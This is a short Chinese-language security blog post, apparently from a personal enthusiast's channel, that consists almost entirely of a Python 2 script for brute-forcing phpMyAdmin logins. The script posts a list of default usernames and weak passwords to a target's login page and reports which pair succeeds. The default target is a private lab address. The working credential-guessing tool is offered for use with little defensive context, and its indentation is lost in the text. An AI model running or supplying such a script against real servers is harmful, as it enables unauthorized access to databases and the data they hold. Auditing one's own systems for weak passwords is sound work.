PHPMyAdmin弱口令猜解
测试截图:
代码片段
#! /usr/bin/env python
# _*_ coding:utf-8 _*_
import requests
import time
username_list=['root']
password_list=['root','','admin','123456','password']
def phpMyAdmin(ip,port=80):
for username in username_list:
username =username.rstrip()
for password in password_list:
password = password.rstrip()
try:
#url = "http://192.168.106.141/phpmyadmin/index.php"
url = "http://"+ip+":"+str(port)+"/phpmyadmin/index.php"
data={'pma_username':username,'pma_password':password}
response = requests.post(url,data=data,timeout=5)
result=response.content
if result.find('name="login_form"')==-1:
print '===================================================='
print '[+] find phpMyAdmin weak password:'+username,password
print '===================================================='
break
else:
print '[-] Checking for '+username,password+" fail"
except:
print '[-] Something Error'+username,password+" fail"
if __name__ == '__main__':
phpMyAdmin("192.168.106.141")
关于我:一个网络安全爱好者,致力于分享原创高质量干货,欢迎关注我的个人微信公众号:Bypass--,浏览更多精彩文章。
